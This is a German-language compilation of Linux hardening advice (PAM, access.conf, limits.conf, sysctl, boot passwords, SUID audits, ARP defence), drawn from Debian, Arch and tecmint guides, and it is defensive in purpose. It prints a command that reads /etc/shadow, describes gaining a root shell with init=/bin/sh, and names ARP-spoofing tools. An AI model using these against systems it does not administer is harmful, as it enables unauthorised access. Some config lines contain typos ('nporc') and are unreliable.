Standardkonfigurationsdatei ist ein Beispiel auskommentiert: -:wheel:ALL EXCEPT LOCAL Vergessen Sie nicht, in /etc/pam.d/ das pam_access-Module für jeden Dienst (oder die Standardkonfiguration) anzuschalten, wenn Sie wollen, dass Ihre Änderungen in /etc/security/access.conf berücksichtigt werden. https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html ftp-Sicherheitseinstellungen vornehmen: Die binä,re Dateikodierung sollte im ftp-Client (wie gftp) aktiviert sein. /etc/ftpusers surfuser # demnach nur der (die) Benutzer namens surfuser /etc/ftp-sites /etc/ftpaccess mail root@localhost loginfails 1 readme README&asterisk; login readme README&asterisk; cwd=&asterisk; message /welcome.msg login message .message cwd=* compress yes all tar no all chmod no none delete no none overwrite no none rename no none log transfers anonymous,real inbound,outbound shutdown /etc/shutmsg passwd-check rfc822 warn Ablauf der Passwort-Gültigkeit überüfen In Linux werden die Passwörter zu den Benutzerkonten in der Datei ´/etc/shadow´ in verschlüsselter Form abgespeichert. Um den Ablauf der Gültigkeit zu überprüfen, verwende man das Kommando ´chage´. #chage -l username Um die Dauer der Gültigkeit eines Passwortes zu verändern, setze #chage -M 60 username #chage -M 60 -m 7 -W 7 userName Parameters -M Set maximum number of days -m Set minimum number of days Quelle: https://www.tecmint.com/linux-server-hardening-security-tips/ Check auf System- und Benutzerkonten mit leeren Passwörtern Leere Passwörter haben unauthorisierten Zugriff zur Folge. Deshalb sollten alle Konten mit starken Passwörtern geschützt sein. Um auf leere Passwörter zu überprüfen, verwende das folgende Kommando: cat /etc/shadow | awk -F: ´($2==""){print $1}´ https://www.tecmint.com/linux-server-hardening-security-tips/ Limitierte Anzahl aktiver Prozesse (Quelle: Arch Linux, https://wiki.archlinux.org/index.php/security) Die Anzahl lässt sich in /etc/security/limits.conf sowohl für alle Benutzer und Gruppen als auch bestimmte Benutzer und Gruppen limitieren, um Angriffe wie "Fork Bombs" und Denial-Of-Service-Attacks vorzubeugen. Im Beispiel wird für alle Benutzer die maximale Anzahl auf 100 gesetzt und nach Gebrauch des prlimit auf maximal 200 angehoben. Zu beachten ist, dass sich bei zu niedrig angesetzten Limits Funktionsstörungen einstellen können. Sichern Sie vor einer Änderung /etc/security/limits.conf ! * soft nproc 300 * hard nporc 320 # user soft nproc 200 # user hard nproc 250 # surfuser soft nproc 160 # surfuser hard nporc 180 toruser soft nproc 100 toruser hard nporc 120 librepository (el6), libsafec-check (fc30, fc29): Finds unsafe APIs Computer - mausklick-schnell ! Bastille, msec, rkhunter, chkrootkit, clamav (clamscan, klamav), maldetect, checksec, seccheck, xsysinfo, smartd, nessus, tkcvs and cervisia, ... Bevor Sicherheit weiterhin Haken für Haken manuell konfiguriert (eingestellt) wird, überlege man sich an dieser Stelle, ob Konfigurations-Programme wie bastille und die Sicherheits-Checks von msec (rosa2016.1, rosa2014.1) erforderliche Sicherheits-Einstellungen protokollieren, falls nicht bereits selbsttätig (automatisch) einen Teil der Arbeit abnehmen sollen. Restriktrierter Zugriff auf Zeiger auf den Kernel innerhalb des proc-Dateisystems (Quelle: Arch Linux, https://wiki.archlinux.org/index.php/security) Beachte: Hardened Linux setzt kptr_restrict meist auf 2 oder 1: . "Enabling kernel.kptr_restrict will hide kernel symbol addresses in /proc/kallsyms from regular users without CAP_SYSLOG, making it more difficult for kernel exploits to resolve addresses/symbols dynamically. This will not help that much on a pre-compiled Arch Linux kernel, since a determined attacker could just download the kernel package and get the symbols manually from there, but if you´re compiling your own kernel, this can help mitigating local root exploits. This will break some perf commands when used by non-root users (but many perf features require root access anyway)." /etc/sysctl.d/50-kptr-restrict.conf kernel.kptr_restrict = 2 Der nächste Punkt fstab-Option hidepid für proc von Quelle Arch Linux, https://wiki.archlinux.org/index.php/security, erfolgt umso mehr auf eigene Gefahr: hidepid "Warnung: Für bestimmte Anwendungen wie Sandbox und auf Xorg können Probleme enstehen. Für unbound empfehlen wir bei daher unbound (rosa2014.1, rosa2016.1) und nicht el6. . Der Kernel ermöglicht das Verstecken von Benutzer-Prozessen, auf die normalerweise Zugriff via /proc besteht, von unpriviligierten Benutzern, indem das (lokale) proc-Dateisystem mit hidepid und gid eingebunden (gemountet) wird. Dadurch wird die Informationsammlung über laufende Prozesse für Eindringlinge, ob einige Daemonen mit besonderen Privilegien laufen, ob für Benutzer oder andere Benutzer sensitive Programme laufen und ob sie überhaupt Programme laufen lassen, verhindert. Weiterer Bonus: Programme sind nun geschützt vor sogenannten "lokalen Eavesdroppers." Die vom Paket fürs Dateisystem beinhaltete proc-Gruppe verhält sich wie eine Whitelist mit authorisierten Benutzern, mit der Fähigkeit, aus anderen Benutzerprofzessen Informationen zu beziehen und zu lernen. . Sollten Benutzer oder Dienste Zugriff auf /proc/>pid<-Verzeichnisse benötigen, füge sie zur Gruppe gid hinzu: Bespiel: Verberge Prozess-Information für alle Benutzer außer Benutzer der Gruppe proc: /etc/fstab (denken Sie vor einer Änderung immer an die Sicherung!): proc /proc proc nosuid,nodev,noexec,hidepid=2,gid=proc 0 0 " Eine weitere Vorbereitung unserer Sicherheitsmaßnahmen erfolgt nun anhand debian.org, https://www.debian.org/doc/manuals/securing-debian-howto/ch1.de.html bis https://www.debian.org/doc/manuals/securing-debian-howto/ch12.de.html. Uns erscheint im Kommenden davon nur ein Gro&szlgi;teil sinnvoll. Verwaltung der Dienste: systemd ab Jahr 2013, MCC -> "Dienste verwalten" oder chkconfig (bzw. ntsysv) Insbesonders die mit jedem Bootvorgang zu startende /etc/rc.local muss noch hinzugefügt werden, gleiches gilt für ip6tables neben iptables. Zu diesem Zweck ist in /etc/init.d rc.local zu erstellen (ggfls. irgendeinen vorgebenen Daemon wie beispielsweise linfw3 aus /etc/init.d kopieren und entsprechend abändern). Unter start() ist lediglich "sh /etc/init.d/rc.local" einzutragen, unbenötigte Variablen und stop() und restart() für rc.local auszutragen und ggfls. die chkconfig-Konfiurationsnummer oben im einkommentierten Kommentar auf eine beliebige andere hin zu ändern. Nun wird der Dienst vorsichtshalber registriert: "chkconfig --add rc.local". Generell werden u.v.a. bei mdv und el6 so alle (zu aktivierenden) Dienste in MCC ->, Systemdienste sichtbar aufgelistet. Nun kann man entweder die Haken in Systemdienste von MCC zur Aktivierung setzen oder die Runlevel für den jeweiligen Dienst von 0 bis 6 mittels chkconfig manuell setzen, i.a. 0-AUS 1-AUS 2-AUS 3-EIN 4-EIN 5-EIN 6-AUS. Dienste kann man auch manuell starten: start (start), neustart (restart) und stop (stop), bei mdv und el6 und vielen anderen Distributionen mittels Kommando wie folgendem: "sh /etc/init.d/linfw3 start". Datenbankserver Dämon (Runlevel-Init-Script) mysqld (el6.remi): wie rc.local oben, aber vor dem Start in /etc/my.cnf die Bind-Addresse einkommentieren. Reverse-Proxy nginx (el6): wie rc.local oben, vorher "cp -axf /usr/lib/perl5/strict.pm /usr/local/share/perl5" und "cp -axf /usr/lib/perl5/warnings* /usr/local/share/perl5/" kopieren. Apache-Webservers httpd (el6): wie oben aber ggfls. Module konfiguriren, alte Apache-Module entfernen. Druckerservers: cups (pclos) LAN-Servers bzw. - Clients: samba-... (el6) nicht erforderlich für herkömmliche Einzelplatzrechner am DSL-Router ... Vorher gilt es natürlich, die Konfigurationen der jeweiligen Server unter /etc in den zugehörigen Konfigurationsdateien vorzunehmen. Auf den genauen Inhalt von /etc/rc.local (und eines weiteren Skripts in /usr/sbin/ voller ACL-Zugriffsrechte mit jedem Booten) kommen wir bald noch zu sprechen. dbus (messagebus): Sicherung der service-Dateien Der dbus vieler Versionen treibt ab und zu sein Unwesen, indem er gelegentlich einzelne service-Dateien aus /usr/share/dbus-1/services und /usr/share/dbus-1/system-services einfach löscht. Daher sollten alle service-Dateien in einem Sicherungs-Verzeichnis gesichert werden. Tausche aus: "Exec=kded" mit "Exec=kded4" nano /usr/share/dbus-1/services/org.kde.kded.service [D-BUS Service] Name=org.kde.kded Exec=/usr/bin/kded4 Setzen Sie ein Passwort im BIOS und Passwö,rter im Bootmanager (grub: Datei /boot/grub/menu.lst) Bevor Sie irgendein Betriebssystem auf Ihrem Computer installieren, setzen Sie ein Passwort im BIOS. Nach der Installation (sobald Sie von der Festplatte booten können) sollten Sie zurück ins BIOS gehen und die Boot-Reihenfolge ändern, so dass Sie nicht von Diskette, CD-ROM oder sonstigen Geräten booten können, von denen dies nicht gehen sollte. Andernfalls benötigt ein Cracker nur physischen Zugang und eine Bootdiskette, um Zugriff auf Ihr ganzes System zu bekommen. Es ist noch besser, wenn das System beim Booten immer ein Passwort verlangt. Dies kann sehr effektiv sein, wenn Sie einen Server laufen lassen, der selten neu gestartet wird. Der Nachteil dieser Vorgehensweise ist, dass das Neustarten einen menschlichen Eingriff benötigt, was zu Problemen führen kann, wenn das System nicht leicht zugänglich ist. Hinweis: Viele BIOS-Varianten haben bekannte Master-Passwörter und es gibt sogar Programme, um Passwörter aus dem BIOS wieder auszulesen. Folglich können Sie sich nicht auf diese Maßnahme verlassen, um den Zugriff auf das System zu beschränken. Setze - Supervisor Password - User Access Level von Full Access, View Only oder Limited auf No Access - verhindert den Benutzerzugriff auf die BIOS-Setup-Utility, so dass keine Änderungen mehr an den Einstellungen vorgenommen werden können. Das BIOS ist nun geschützt. - User Password - Password Check von (BIOS-)Setup auf Always (immer) Boot-process: If the message "Can not stat ( a named ) initscript" occurs during system boot, delete this initscript through all six runlevel and in directory init.d by rm -df /etc/rc0.d/initscript-name rm -df /etc/rc1.d/initscript-name ... rm -df /etc/rc6.d/initscript-name rm -df /etc/init.d/initscript-name Kernel-Module ein- bzw. ausbinden Eine Auflistung aller Module unter Angabe ihrer Beziehungen erhält man mit dem Terminal-Befehl lsmod. Um den Rechner einmal mehr mausklick-schnell zu halten, sind alle nicht benötigten Module aus /etc/rc.modules auszutragen, während ihre Einbindung am Schluss der Datei mit &quto;modprobe Modulname" erfolgt. Unserer Beispiel-Hardware siehe unter Datenblatt nach sind also die Kontroll-Module it87 und i2c-dev auszutragen und der im Schlussteil des Exkurses angesprochene Dienst lm_sensors zu deaktivieren. Gehen Sie nicht ins Internet, bevor Sie nicht bereit sind Während der Installation sollten Sie das System nicht sofort mit dem Internet verbinden. Dies hört sich vielleicht komisch an, aber die Installation über das Netzwerk ist eine gängige Methode. Da das System einige Dienste installiert und diese sofort aktiviert werden, könnten Sie Ihr System für Angriffe öffnen, wenn das System mit dem Internet verbunden ist und die Dienste nicht geeignet konfiguriert sind. Lassen Sie so wenige Dienste wie möglich laufen Dienste sind Programme wie FTP- und Web-Server. Da sie auf eingehende Verbindungsanfragen, die den Dienst anfordern, warten müssen, können sich externe Computer mit Ihrem Computer verbinden. Dienste sind manchmal verwundbar (das heißt, durch einen bestimmten Angriff kompromittierbar) und stellen dadurch ein Sicherheitsrisiko dar: portmap (NFS), automount (NFS, Netzwerk-Dateisystem), named (DNS), ftpd, rexec, rlogin, telnet, inetd, lpd (Drucksystem), smbd und nmbd (Samba), ... https://www.tecmint.com/remove-unwanted-services-from-linux/ Ein Passwort für LILO oder GRUB einstellen Jeder kann sehr einfach eine Root-Shell auf Ihrem System bekommen, indem er einfach <Name-Ihres-Bootimages> init=/bin/sh am Bootprompt eingibt. Nachdem die Passwörter geändert und das System neu gestartet wurde, hat die Person uneingeschränkten Root-Zugang und kann nach Belieben alles auf Ihrem System machen. Nach dieser Prozedur haben Sie keinen Root-Zugang mehr zu Ihrem System, weil Sie das Root-Passwort nicht kennen. umask (siehe man umask): Empfohlene Werte: /etc/fstab: Option umask 077 u.a. für root- und home-Partition ~/.bashrc: umask 077 # für alle Benutzer ~/.bashrc-profile: umask 077 # für alle Benutzer /etc/profile: umask 022 # um den Benutzern Lese- und Schreibzugriff zu gewähren Entfernen des Root-Prompts aus dem Kernel Hinweis: Dies trifft nicht auf Kernel zu, die in Debian 3.1 enthalten sind, da die Wartezeit auf Null verändert wurde. Linux 2.4-Kernel bieten kurz nach dem Laden des Cramfs einen Weg, Zugriff auf eine Root-Shell zu bekommen, also während das System bootet. Es erscheint eine Meldung, die dem Administrator erlaubt, eine ausführbare Shell mit Root-Privilegien zu öffnen. Diese Shell kann dazu benutzt werden, manuell Module zu laden, falls die automatische Erkennung fehlschlägt. Dies ist das Standard-Verhalten bei initrds linuxrc. Die folgende Meldung wird erscheinen. Da wir FSE einsetzen, empfiehlt sich die Entfernung von rd.shell aus den Bootoptionen von grub /boot/menu/grub, analog grub2. Einschränkung des System-Neustarts von der Konsole aus Wenn eine Tastatur an Ihr System angeschlossen ist, kann es jeder (ja, wirklich jeder) mit physischem Zugang zu Ihrem System neu starten, ohne sich an Ihrem System anmelden zu müssen, einfach indem er die Tastenkombination Strg+Alt+Entf drückt (auch als Affengriff bekannt). Dies könnte gegen Ihre Sicherheitsrichtlinien verstoßen (oder auch nicht). Dies ist schwerwiegender, wenn das Betriebssystem in einer virtuellen Umgebung läuft. Dann erstreckt sich diese Fähigkeit auch auf Benutzer, die Zugriff auf die virtuelle Konsole haben (was auch über das Netzwerk geschehen könnte). Beachten Sie zudem, dass in einer solchen Umgebung diese Tastenkombination ständig verwendet wird (um in einigen grafischen Benutzeroberflächen eine Login-Shell zu öffnen), so dass ein Systemadministrator sie virtuell auslösen kann und das System neu startet. Es gibt zwei Möglichkeiten, dies einzuschränken: mit einer Konfiguration, mit der nur bestimmte Benutzer das System neu starten dürfen, diese Eigenschaft vollständig zu deaktivieren. Wenn Sie dies einschränken wollen, müssen Sie in /etc/inittab sicherstellen, dass die Zeile, die ctrlaltdel enthält, shutdown mit der Option -a aufruft. Standardmäßig enthält Debian diese Optionen: ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now Fertigen Sie vor Änderungen in Konfigurationsdateien immer eine Sicherung an! The -a switch, as the shutdown(8) manpage describes, makes it possible to allow some users to shutdown the system. For this the file /etc/shutdown.allow must be created and the administrator has to include there the name of users which can boot the system. When the three finger salute combination is pressed in a console the program will check if any of the users listed in the file are logged in. If none of them is, shutdown will not reboot the system. Wenn Sie die Tastenkombination Strg+Alt+Entf deaktivieren möchten, müssen Sie nur die Zeile mit ctrlaltdel in /etc/inittab auskommentieren. Vergessen Sie nicht, init q auszuführen, nachdem Sie diese Datei bearbeitet haben, damit die änderungen wirksam werden. Einschränkung der Tastenkombination "Magische S-Abf" Die Tastenkombination Magische S-Abf (Magic SysRq) erlaubt es Benutzern einer Konsole eines Linux-Systems, bestimmte systemnahe Befehle auszuführen, indem gleichzeitig Alt+S-Abf und eine bestimmte Taste gedrückt wird. Die Taste S-Abf wird auf vielen Tastaturen mit Druck bezeichnet. Seit der Veröffentlichung von Etch ist die Tastenkombination Magische S-Abf im Linux-Kernel aktiviert, damit die Benutzer einer Konsole bestimmte Privilegien erhalten können. Ob dies auf Ihr System zutrifft, erkennen Sie daran, ob /proc/sys/kernel/sysrq existiert, und an dessen Wert. Sie sollten diese Fähigkeit deaktivieren, wenn der Zugang zur Konsole nicht auf angemeldete Benutzer beschränkt ist, nämlich wenn die Konsole an ein Modem angebunden ist, es leichten physischen Zugang zum System gibt oder es in einer virtuellen Umgebung läuft und andere Benutzer auf die Konsole zugreifen können. Dafür müssen Sie /etc/sysctl.conf bearbeiten und folgende Zeile einfügen: # Schaltet die Magische S-Abf-Taste ab kernel.sysrq = 0 Weitere Einstellungsmöglichkeiten mit PAM: Den Benutzerzugang absichern: Benutzerauthentifizierung: PAM PAM (Pluggable Authentication Modules) erlaubt Systemadministratoren, auszuwählen, wie Anwendungen Benutzer authentifizieren. Beachten Sie, dass PAM nichts machen kann, solange die Anwendung nicht mit Unterstützung für PAM kompiliert wurde. Die meisten Anwendungen, die mit Debian geliefert werden, haben diese Unterstützung eingebaut. Vor Version 2.2 hatte Debian keine Unterstützung für PAM. Die derzeitige Standardkonfiguration für jeden Dienst, der PAM benutzt, ist es, UNIX-Authentifizierung zu emulieren (lesen Sie /usr/share/doc/libpam0g/Debian-PAM-MiniPolicy.gz, um mehr darüber zu erfahren, wie PAM-Dienste unter Debian arbeiten sollten). Jede Anwendung mit PAM-Unterstützung stellt eine Konfigurationsdatei unter /etc/pam.d/ zur Verfügung, in welcher Sie ihr Verhalten einstellen können: - welches Verfahren zur Authentifizierung benutzt wird - welches Verfahren innerhalb einer Sitzung benutzt wird - wie Passwörter überprüft werden Die folgende Beschreibung ist weit davon entfernt, vollständig zu sein. Für weitere Informationen können Sie die Linux-PAM Guides lesen. Diese Dokumentation ist auf Ihrem System unter /usr/share/doc/libpam-doc/html/ verfügbar, wenn Sie libpam-doc installieren. https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html, Kapitel 4.11 Aktionen bei der Benutzeranmeldung: Bearbeiten von /etc/login.defs (vorher sichern!) Der nächste Schritt ist es, die grundlegende Konfiguration und die Aktionen bei der Benutzeranmeldung zu bearbeiten. Beachten Sie, dass diese Datei kein Bestandteil der PAM-Konfiguration ist. Sie ist eine Konfigurationsdatei, die von den Programmen Login und Su berücksichtigt wird. Es ist also wenig sinnvoll, sie auf Fälle abzustimmen, in denen keines der beiden Programme wenigstens indirekt aufgerufen wird (Das Programm Getty, welches auf der Konsole läuft und die anfängliche Anmeldeaufforderung zu Verfügung stellt, ruft Login auf). FAILLOG_ENAB yes Wenn Sie diese Variable einschalten, werden fehlgeschlagene Anmeldeversuche protokolliert. Es ist wichtig, hier auf dem Laufendem zu bleiben, um jemanden zu ermitteln, der einen Brute-Force-Angriff versucht. LOG_UNKFAIL_ENAB no Wenn Sie diese Variable auf "yes"; setzen, werden unbekannte Benutzernamen protokolliert, wenn eine Anmeldung scheitert. Es ist zu empfehlen, sie auf "no" (den Standard) zu belassen, da anderenfalls das Passwort eines Benutzers aufgezeichnet werden könnte (falls er nämlich versehentlich anstatt seines Benutzernames sein Passwort eingibt). Falls Sie sie dennoch auf "yes" setzen, müssen Sie sicherstellen, dass die Protokolldateien angemessene Zugriffsrechte haben (zum Beispiel 640, mit einer passenden Gruppenzugehörigkeit wie adm). SYSLOG_SU_ENAB yes Dies schaltet das Mitprotokollieren von su-Versuchen im Syslog ein. Sehr wichtig auf ernsthaft betriebenen Maschinen, aber beachten Sie, dass dies auch die Privatsphäre verletzen kann. SYSLOG_SG_ENAB yes Das gleiche wie bei SYSLOG_SU_ENAB, aber für das Programm Sg. ENCRYPT_METHOD SHA512 Wie bereits erklärt, reduziert eine Verschlüsselung von Passwörtern die Gefahr von Wörterbuchangriffen erheblich, da Sie längere Passwörter benutzen können. Diese Definition muss mit dem Wert in /etc/pam.d/common-password übereinstimmen. Aktionen bei der Benutzeranmeldung: /etc/pam.d/login bearbeiten (vorher sichern!) Sie können die Datei zur Konfiguration des Anmeldevorgangs anpassen, um eine strengere Richtlinie festzuschreiben. Zum Beispiel können Sie die Wartezeit zwischen zwei Anmeldeversuchen im Vergleich zur Standardkonfiguration erhöhen. Diese Standardvorgabe setzt eine Wartezeit von drei Sekunden: auth optional pam_faildelay.so delay=3000000 Wenn Sie den Wert von delay erhöhen, wird es schwieriger, sich durch bloßes Ausprobieren von Passwörtern (brute force) erfolgreich am Terminal anzumelden. Wenn ein falsches Passwort eingegeben wird, muss ein möglicher Angreifer (oder ein normaler Benutzer!) viele Sekunden warten, bis er wieder eine Eingabeaufforderung erhält, wodurch das Durchprobieren von Passwörtern sehr zeitaufwendig werden kann. So müssen etwa Benutzer bei delay=10000000 zehn Sekunden warten, wenn sie das falsche Passwort eingeben. In dieser Datei können Sie auch einrichten, dass das System dem Benutzer vor einer Anmeldung eine Nachricht anzeigt. Standardmäßig ist dies deaktiviert, wie Sie hier sehen können: # auth required pam_issue.so issue=/etc/issue Falls es Ihre Sicherheitsrichtlinie erfordert, können Sie mit dieser Datei eine Standardnachricht, dass der Zugang zum System beschränkt und der Benutzerzugang protokolliert wird, anzeigen lassen. Ein solcher Hinweis kann in bestimmten Regionen und nach der jeweiligen Rechtsprechung notwendig sein. Um dies zu aktivieren, müssen Sie nur die entsprechende Mitteilung in die Datei /etc/issue [30] eintragen und das Kommentarzeichen in der Zeile in /etc/pam.d/login entfernen, um das Modul pam_issue.so zu aktivieren. In dieser Datei können Sie weitere Einstellungen vornehmen, die für Ihre Sicherheit relevant sein könnten, wie zum Beispiel: Regeln erstellen, welcher Benutzer zu welchen Zeiten auf das System zugreifen kann, indem Sie das Modul pam_time.so aktivieren und /etc/security/time.conf entsprechend konfigurieren (standardmäßig deaktiviert), den Anmeldevorgang so einrichten, dass Benutzerbegrenzungen, die in /etc/security/limits.conf definiert sind, verwendet werden (standardmäßig aktiviert), dem Benutzer Informationen über die vorangegangene Anmeldung anzeigen (standardmäßig aktiviert), nach erfolgter Anmeldung den Benutzern eine Nachricht (/etc/motd und /run/motd.dynamic) anzeigen (standardmäßig aktiviert). Ftp einschränken: bearbeiten von /etc/ftpusers Die Datei /etc/ftpusers enthält eine Liste von allen Benutzern, denen es nicht erlaubt ist, sich auf dem Rechner mit Ftp einzuloggen. Benutzen Sie diese Datei nur, wenn Sie wirklich Ftp erlauben wollen (wozu im Allgemeinen nicht geraten wird, da es Klartext-Passwörter benutzt). Wenn Ihr Ftp-Daemon PAM unterstützt, können Sie dies ebenfalls benutzen, um Benutzern bestimmte Dienste zu erlauben oder zu verbieten. FIXME (FEHLER): Ist es ein Fehler, dass ftpusers in Debian standardmäßig nicht die Benutzer mit Administratorenrecht (in base-passwd) beinhaltet? Folgender Befehl ist ein bequemer Weg, alle Systemkonten zu /etc/ftpusers hinzuzufügen: $ awk -F : ´{if ($3<1000) print $1}´ /etc/passwd > /etc/ftpusers /etc/security/access.conf (System mausklick-schnell; Datei vorher sichern!): Wie in /etc/security/access.conf bereits in einkommentierter Form angegeben, nun übertragen auf root und einzelne Systembenutzer und lokale Benutzer: # User "root" should be denied to get access from all other sources. - : root : ALL - : user : ALL - : surfuser : ALL - : toruser : ALL - : surfuser: ALL - : wheel:ALL EXCEPT LOCAL - : toruser : ALL - : lp : ALL # not for printer server - : user : ALL - : toruser : ALL - : uuidd : ALL - . messagebus: ALL - : ftp : ALL - : mail : ALL - : pop3ad : ALL - : bin : ALL - : daemon : ALL - : adm : ALL - : sync : ALL - : halt : ALL - : news : ALL # Gehe so für möglicherweise alle Benutzer vor, um sie vor Zugriff von außen zu schützen. : ALL : ALL Verhindere unbenötigte SUID- und SGID-Binärdateien Alle Dateien mit gesetzten SUID/SGID-Bits können missbraucht werden, wenn die unter SUID/SGID ausführbare Datei ein Sicherheitsproblem oder Bug hat. Alle lokalen Benutzer und Benutzer mit Fernzugriff können diese Dateien missbrauchen. Finde solche Dateien heraus, indem das Kommando find angewandt wird wie folgt: # Suche alle SUID-Dateien: find / -perm +4000 # Suche alle SGID-Dateien find / -perm +2000 # Oder kombiniere die Suche in einem einzigen Kommando: find / ( -perm -4000 -o -perm -2000 ) -print find / -path -prune -o -type f -perm +6000 -ls Ananlysiere die dabei entstehenden Dateien. https://www.cyberciti.biz/tips/linux-security.html How to Remove (Delete) Symbolic Links in Linux, linuxize.com, 09.05.2019 A symbolic link, also known as a symlink, is a special type of file that points to another file or directory. It is something like a shortcut in Windows. A symlink can point to a file or a directory on the same or a different filesystem or partition. In this guide, we will show you how to remove (delete) symbolic links in Linux/UNIX systems using the rm, unlink, and find commands. ... find /path/to/directory -maxdepth 1 -xtype l https://linuxize.com/post/how-to-remove-symbolic-links-in-linux/ Safe-Linking: Making Linux exploitation harder, itweb.co.za, 22.05.2020 Businesses and users alike are constantly on the lookout for easier ways to do things, and shortcuts that help us work faster and with less effort. Unfortunately, bad actors are no different, and are always hunting for existing vulnerabilities or weaknesses, that can be exploited. [...] A good example of this would be memory corruption attacks, which are often employed to exploit programs written in Linux, the most widely-used open source operating system in the world. With this in mind, Check Point has created Safe-Linking, a security mechanism to protect the internal structure of the heap - or the portion of memory that is not set to a constant size before compilation and can be controlled dynamically by a programmer - from being tampered with. [...] Simply put, Safe-Linking removes the address data for the program, so the bad actor can no longer be sure where in the system´s memory it will be loaded - making it much harder for them to launch an exploit against the program," the company adds. https://www.itweb.co.za/content/Kjlyrvw1ejVMk6am https://reportcybercrime.com/safe-linking-making-linux-exploitation-harder/ Check Point schließt 20 Jahre alte Sicherheitslücke in Linux, trojaner-info.de, 26.05.2020 Das Check Point Research Team führt eine neue Schutzmaßnahme für das Betriebssystem ein, die sich Safe-Linking nennt. Uralte Schwachstelle endlich geschlossen. Das Check Point Research Team führt eine neue Sicherheitsmethode ein, um Linux-Systeme um einiges sicherer zu machen. Den Sicherheitsforschern gelang es, eine 20 Jahre alte und bestens bekannte Sicherheitslücke endlich zu schließen. https://www.trojaner-info.de/sicher-anonym-im-internet/aktuelles/ check-point-schliesst-20-jahre-alte-sicherheitsluecke-in-linux.html [...] In our latest research, we created a security mechanism, called "Safe-Linking", to protect malloc()´s single-linked lists from tampering by an attacker. We successfully pitched our approach to maintainers of core open-source libraries, and it is now integrated into the most common standard library implementation: glibc (Linux) and its popular embedded counterpart: uClibc-NG. https://www.terabitweb.com/2020/05/21/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/ Setzen der Syncookies Diese Option ist ein zweischneidiges Schwert. Auf der einen Seite schützt es Ihr System vor dem Überfluten mit syn-Paketen. Auf der anderen Seite verletzt es definierte Standards (RFCs). net/ipv4/tcp_syncookies = 1 Wenn Sie das dauerhaft für den Kernel festlegen wollen, müssen Sie in /etc/network/options syncookies=yes festlegen (Debian). Jedes Mal, wenn /etc/init.d/networking ausgeführt wird (was typischerweise beim Booten geschieht), wird diese Option wirksam. Dagegen wird folgendes nur eine einmalige Wirkung bis zum nächsten Neustart haben: echo 1 > /proc/sys/net/ipv4/tcp_syncookies (Aufruf z.B. über /etc/rc.local) oder setze dieses und andere Parameter zur Netz-Schnittstellenabsicherung in /etc/sysctl.conf: net.ipv4.tcp_syncookies = 1 Lösung des Problems der Weak-End-Hosts Auf Systemen mit mehr als einer Schnittstelle zu verschiedenen Netzwerken können Dienste so eingerichtet werden, dass sie Verbindungen nur zu einer bestimmten IP-Adresse zulassen. Normalerweise verhindert das den Zugang zu diesen Diensten, wenn an sie Anfragen über andere Adressen gestellt werden. Allerdings bedeutet das nicht, dass der Dienst an eine bestimmte Hardware-Adresse (Netzwerkkarte) gebunden ist (ein verbreiteter Irrtum). Das ist kein Problem von ARP und auch keine Verletzung eines RFCs (es wird in RFC1122, Abschnitt 3.3.4.2 als weak end host bezeichnet). Vergessen Sie nicht, dass IP-Adressen nichts mit dem physischen Schnittstellen zu tun haben. Im Kernel 2.2 (und davor) konnte dieses Problem so gelöst werden: echo 1 > /proc/sys/net/ipv4/conf/all/hidden echo 1 > /proc/sys/net/ipv4/conf/eth0/hidden echo 1 > /proc/sys/net/ipv4/conf/eth1/hidden ..... Bei späteren Kernel kann das folgendermaßen gelöst werden: Regeln für iptables richtig konfiguriertes Routing oder Patchen des Kernels Along this text there will be many occasions, in which it is shown, how to configure some services (sshd server, apache, printer service...) in order to have them listening on any given address, the reader should take into account that, without the fixes given here, the fix would not prevent accesses from within the same (local) network. https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html Schutz vor ARP-Angriffen Wenn Sie den anderen Kisten in Ihrem LAN nicht trauen (das sollte immer so sein, da es die sicherste Einstellung ist), sollten Sie sich vor den verschiedenen ARP-Angriffen schützen. Wie Sie wissen, wird das ARP-Protokoll dazu verwendet, IP-Adressen mit MAC-Adressen zu verknüpfen (für alle Details siehe RFC826). Jedes Mal, wenn Sie ein Paket an eine IP-Adresse schicken, wird eine ARP-Auflösung vorgenommen (zuerst wird in den lokalen ARP-Speicher geschaut, und falls die IP nicht im Speicher ist, wird ein Rundruf (Broadcast) mit der ARP-Anfrage verschickt), um die Hardware-Adresse des Ziels zu finden. Alle ARP-Angriffe zielen darauf ab, Ihrem Rechner vorzugaukeln, dass die IP-Adresse des Rechners B mit der MAC-Adresse des Computers des Angreifers verbunden ist. Dadurch wird jedes Paket, das Sie an den Rechner B, der mit der IP-Adresse verbunden ist, schicken wollen, an den Computer des Eindringlings umgeleitet ... Diese Angriffe (Verfälschung des ARP-Speichers, ARP-Spoofing, ...) ermöglichen dem Angreifer, auf Netzwerken den Verkehr abzuhören (selbst bei Netzwerken, die über einen Switch laufen). Er kann sich leicht in eine Verbindung einschleusen oder einen Host vom Netzwerk nehmen oder ... ARP-Angriffe sind leistungsfähig und einfach durchzuführen. Es gibt dafür auch einige Werkzeuge wie arpspoof aus dem Paket dsniff oder arpoison. Allerdings gibt es immer eine Lösung: Verwenden Sie einen statischen ARP-Speicher. So erstellen Sie "statische" Einträge in Ihrem ARP-Speicher: arp -s host_name hdwr_addr Indem Sie statische Einträge für jeden wichtigen Host in Ihrem Netzwerk vergeben, stellen Sie sicher, dass niemand einen (falschen) Eintrag für diese Hosts erstellen oder verändern kann (statische Einträge verfallen nicht und können nicht verändert werden). Auch gefälschte ARP-Antworten werden ignoriert. Entdecken Sie verdächtigen ARP-Verkehr. Sie können dazu arpwatch, karpski oder allgemeinere IDS, die auch verdächtigen ARP-Verkehr entdecken können wie snort oder prelude, einsetzen. Verwenden Sie einen IP-Filter, der die MAC-Adressen überprüft. https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html Die Nutzung von Tcpwrappern TCP wrappers were developed when there were no real packet filters available and access control was needed. Nevertheless, they´re still very interesting and useful. The TCP wrappers allow you to allow or deny a service for a host or a domain and define a default allow or deny rule (all performed on the application level). If you want more information take a look at hosts_access. Viele der unter Debian installierten Dienstewerden entweder durch den TCP-Wrapper Service (tcpd) aufgerufen oder wurden mit Unterstützung für libwrapper (Bibliothek für TCP-Wrapper) kompiliert. Einerseits werden Sie bei manchen Diensten (einschließlich telnet, ftp, netbios, swat und finger), die in /etc/inetd.conf konfiguriert werden, sehen, dass die Konfigurationsdatei zuerst /usr/sbin/tcpd aufruft. 